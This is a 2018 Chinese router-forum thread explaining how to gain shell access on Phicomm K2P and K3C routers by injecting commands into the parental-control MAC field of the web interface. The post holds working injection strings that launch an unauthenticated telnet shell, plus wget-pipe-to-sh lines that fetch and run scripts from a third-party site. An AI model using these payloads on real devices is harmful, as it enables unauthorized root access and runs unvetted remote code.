QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888

[k2p] 【2018-05-07】K2P MTK、K3C最新官方固件开telnet、刷官改方法

火... [复制链接]

本方法适用于最新的K2P MTK 22.8.5.189固件及K3C 32.1.46.268、32.1.49.293固件刷机。

你需要知道的是,官方很有可能在下一个版本封堵此漏洞,请谨慎升级官方新固件

提示:刷机有风险,尤其是K3C,请谨慎操作!

【利用web漏洞开telnet】
1、打开web管理页面,进入“家长控制”,打开开关,随便创建一条记录
点击“允许上网时段”图标,随便选择时段,保存即可
2、打开浏览器的开发工具(我用的是傲游浏览器,按F12键可打开),找到MAC地址(技巧:点击红框处的箭头,然后鼠标移到MAC地址栏点击,可迅速定位),注意MAC地址有几处,你需要找到"<tr class"开头的
3、鼠标双击找到的MAC地址进行编辑,在MAC地址后增加“;/usr/sbin/telnetd -l /bin/sh &”,注意不要输入引号,分号应该紧跟MAC地址,可参考下图。编辑完成后,回车或鼠标点击一下退出编辑,然后点击允许上网时段图标
4、随便选个时段,然后点击保存
5、完成后,界面会变成如下所示,表示开telnet成功

【telnet下刷官改】
用windows CMD登录(telnet 192.168.2.1),也可以用putty登录telnet

先要使路由器处于联网状态,telnet登录后输入下面的命令,注意不要刷错了,可以拷贝,然后鼠标右键粘贴

刷K2P MTK 官改:
  1. wget http://iytc.net/down/k2p.sh -O - |sh
复制代码

刷K3C 官改:

1. wget http://iytc.net/down/k3c.sh -O - |sh
复制代码

当然你也可以省略开telnet这一步,在开telnet步骤3中,将“;/usr/sbin/telnetd -l /bin/sh &”直接替换为下面的WEB刷机命令即可,注意:先确保路由器处于联网状态

K2P MTK直接WEB刷机命令:
  1. ;wget http://iytc.net/down/k2p.sh -O - |sh
复制代码

K3C直接WEB刷机命令:
  1. ;wget http://iytc.net/down/k3c_web.sh -O - |sh
复制代码

输入web刷机命令,在步骤4选择“允许上网时段”时段,点击保存后,会一直处于等待状态,此时表示正在下载、刷新固件,请耐心等待10分钟。

注意:
如果在telnet下刷机,会有信息提示,如果用WEB刷机,不会有任何提示,你所需要做的就是等待
输入刷机命令后,会自动下载固件并刷机,自动刷机前会进行MD5校验,以保证下载文件正确,刷机完成后会自动复位,在此期间,千万不能手动复位或断电。
输入命令后请等待10分钟再访问WEB管理页面,查看是否已经正确刷入,如果没有正确刷入,可能是文件下载失败,请等待30分钟以上再复位或断电,检查路由器是否联网或更换线路、加代理后重试。
升级成功后,会自动恢复出厂,正常配置后清除一次计算机浏览器的缓存。

【补救措施】
如果刷机后无法启动,K2P进breed重刷一次官改固件即可;

K2P Breed进入方法:
1、计算机设置为自动获取IP,计算机网线连接K2P的任一LAN口
2、K2P断电,按住K2P复位键,K2P开电,按住10秒后放开
3、访问http://192.168.1.1,可刷入K2P的任何版本
4、重新启动后建议K2P恢复一次出厂设置;

K3C如果刷机后无法正常启动,请等待10分钟,然后长按复位键恢复出厂,多重启和恢复出厂几次,不到万不得已不要尝试下面的方法
如果反复重启和恢复出厂无法正常启动,进官方UBOOT重刷官方268固件两次,如果还是不行,重刷官方175固件两次尝试

K3C UBoot进入方法:
1、计算机设置为固定IP:192.168.2.2,计算机网线连接K2P的任一LAN口
2、K3C断电,按住K3C复位键,K3C开电,按住20秒后放开
3、访问http://192.168.2.1,刷入K3C官方版本
4、重新启动后K3C恢复出厂;计算机恢复为自动获取IP
如果进Uboot重刷也无法启动,可以拆机接TTL救砖

如果有其他问题,也可加入QQ交流群反馈:626288937

你说的很对。: 5.0 我赞同你的说法。: 5.0
补充一点,在管理界面恢复出厂设置后,可能会导致路由重新开机后电脑网线口无法获取ip,换K3C哪个孔问题都一样。此时用手机连接K3C的wifi进行初始设置后便可解决。  发表于 2018-7-7 12:27
你说的很对。: 5 我赞同你的说法。: 5
楼主有一点没说明:允许上网时段要填现在你刷机的时段,不然不能联网在线刷官改的!!!  发表于 2018-7-7 10:00
按你的办法,已经在线刷官改成功。原始268版本。  发表于 2018-6-14 12:50
web 高手!  发表于 2018-5-8 04:55

评分

huitten + 1 一看就是觉得高端、大气、上档次!
secowu + 2 面对这种帖子,我内心复杂,真不知道说什么好……
liyuwenbf + 1 面对这种帖子,我内心复杂,真不知道说什么好……
天天顺心 + 1 强大的恩山!(以下重复1万次)
sepb + 1 面对这种帖子,我内心复杂,真不知道说什么好……
大菜头 + 1 率全体恩山路由党以及党魁向你学习!
肆柒一丶 + 1 强大的恩山!(以下重复1万次)
南柯一梦233 + 1 面对这种帖子,我内心复杂,真不知道说什么好……
wepat + 1 强大的恩山!(以下重复1万次)
TechDaniel + 1 强大的恩山!(以下重复1万次)
gyh337546315 + 1 面对这种帖子,我内心复杂,真不知道说什么好……
双喜 + 1 面对这种帖子,我内心复杂,真不知道说什么好……
right234 + 1 How ever,this is JB useful!
keks123 + 1 赢了会所嫩模,输了回家蒸馍
k2p999 + 1 强大的恩山!(以下重复1万次)
baymin + 1 面对这种帖子,我内心复杂,真不知道说什么好……
ppoqppoq + 1 强大的恩山!(以下重复1万次)
956976901 + 1 强大的恩山!(以下重复1万次)
jing1345061 + 1 面对这种帖子,我内心复杂,真不知道说什么好……
接盘侠 + 1 给力
胡作非为射手 + 1 强大的恩山!(以下重复1万次)
sbug007 + 1 率全体恩山路由党以及党魁向你学习!
zhuzjj008 + 1 楼主有一点没说明:允许上网时段要填现在你刷机的时段,不然不能联网在线刷官改的!!
minlink + 1 一看就是觉得高端、大气、上档次!
不知名悲伤 + 1 强大的恩山!(以下重复1万次)
新手小白 + 1 一看就是觉得高端、大气、上档次!
12246 + 1 一看就是觉得高端、大气、上档次!
古月月 + 1 强大的恩山!(以下重复1万次)
lcbmw + 1 今天天气不错,适合泡妞。
snccwt + 1 强大的恩山!(以下重复1万次)
wdr6300V2 + 1 强大的恩山!(以下重复1万次)
wuliang365702 + 1 强大的恩山!(以下重复1万次)
hot2ice + 1 我来恩山就是为了撩你!
caliban + 1 我来恩山就是为了撩你!
yzh1115 + 1 强大的恩山!(以下重复1万次)
warmansdad + 1 强大的恩山!(以下重复1万次)
ql1307096 + 1 我对你的敬仰犹如江水滔滔,我上朝鲜战场后一定写信给你!!!
LinXiaoLong + 1 How ever,this is JB useful!
aibai + 1 支付宝已转5毛给你!
OMysaa + 1 我对你的敬仰犹如江水滔滔,我上朝鲜战场后一定写信给你!!!
play108 + 1 强大的恩山!(以下重复1万次)
polato + 1 我来恩山就是为了撩你!
一路吧 + 1 这难道就是江湖中失传的注入!
王钢弹 + 1 遗失主机连接-A大怎么办呢?
梦里逐浪 + 1 我来恩山就是为了撩你!
私念罢了 + 1 支付宝已转5毛给你!
duqq + 1 我来恩山就是为了撩你!
homercharles + 1 我来恩山就是为了撩你!
xuening1003 + 1 我爱你,
zgrzq + 1 我对你的敬仰犹如江水滔滔,我上朝鲜战场后一定写信给你!!!
gunsp + 1 我来恩山就是为了撩你!
caozp + 1 强大的恩山!(以下重复1万次)
babybye + 1 已经刷新到官改版本,用的是Opboot,怎么刷你这个固件呢?
dyufan + 1 强大的恩山!(以下重复1万次)
尘埃菌 + 1 我对你的敬仰犹如江水滔滔,我上朝鲜战场后一定写信给你!!!
_老司机_ + 1 我来恩山就是为了撩你!
shdnh + 1 强大的恩山!(以下重复1万次)
109109109lf + 1 强大的恩山!(以下重复1万次)
wlzc2008 + 3 谢谢你,我k2p a1升级到官方22.8.5.189一次成功刷到了22.8.5.
lenmo + 1 强大的恩山!(以下重复1万次)
wsbh + 1 我对你的敬仰犹如江水滔滔,我上朝鲜战场后一定写信给你!!!
潜水者 + 1 兄弟,你肥皂又掉了…你是故意掉的?
gameboo + 1 我对你的敬仰犹如江水滔滔,我上朝鲜战场后一定写信给你!!!
kius + 1 一看就是觉得高端、大气、上档次!
我还在线 + 1 强大的恩山!(以下重复1万次)
jathyking + 1 我来恩山就是为了撩你!
sammen + 1 强大的恩山!(以下重复1万次)
zhanghypo + 1 很好,支持!
相信自己嘎嘎 + 1 我对你的敬仰犹如江水滔滔,我上朝鲜战场后一定写信给你!!!
xytb + 5 给力!
jjwwsm2012 + 1 给力
甜橙飘飘 + 1 有没有时间研究下K2的最新固件22.6.510.57开telnet?万分感谢!
JesseTzh + 1 强大的恩山!(以下重复1万次)
wo76101 + 1 我来恩山就是为了撩你!
princewang + 1 我来恩山就是为了撩你!
zangma + 1 我来恩山就是为了撩你!
sammy1229 + 1 我来恩山就是为了撩你!
fdfev + 3 我来恩山就是为了撩你!
鲜锅兔儿 + 5 支付宝已转5毛给你!
大炳 + 1 支付宝已转5毛给你!
kksky520 + 1 我来恩山就是为了撩你!
xuanyuanyun + 1 我来恩山就是为了撩你!
美丽过度 + 1 我来恩山就是为了撩你!
微信an113888 + 1
qvb52045 + 1 我来恩山就是为了撩你!
lwiibj + 1 我来恩山就是为了撩你!
weitianyu1126 + 1 我来恩山就是为了撩你!
cj8510 + 1 强大的恩山!(以下重复1万次)
1697817057 + 1 强大的恩山!(以下重复1万次)
Dwwwwww + 1 支付宝已转5毛给你!
xiaoboy + 5 强大的恩山!(以下重复1万次)

我的恩山、我的无线 The best wifi forum is right here.
我的恩山、我的无线 The best wifi forum is right here.

沙发?第一次。

A大犀利,看看怎么操作

thx for sharing

真快。。。
大神好厉害。。

看看是什么

牛逼!!!

新的方法 在

这么厉害 瞅瞅啥方法

感谢楼主分享

大神就是大神,不知斐讯工程师会怎么想

所以说 为什么斐讯的工程师当不了大神 可能是境界不够吧  详情 回复 发表于 2020-8-5 12:37
“打开浏览器的开发工具(我用的是傲游浏览器,按F12键可打开),找到MAC地址(技巧:点击红框处的箭头,然后鼠标移到MAC地址栏点击,可迅速定位),注意MAC地址有几处,你需要找到"  详情 回复 发表于 2019-3-19 20:08
斐讯工程师都在抢着吃屎,没空多想。  发表于 2018-5-8 13:29

感谢感谢大神!

多谢多谢,试试看

6666666666666666666“6666”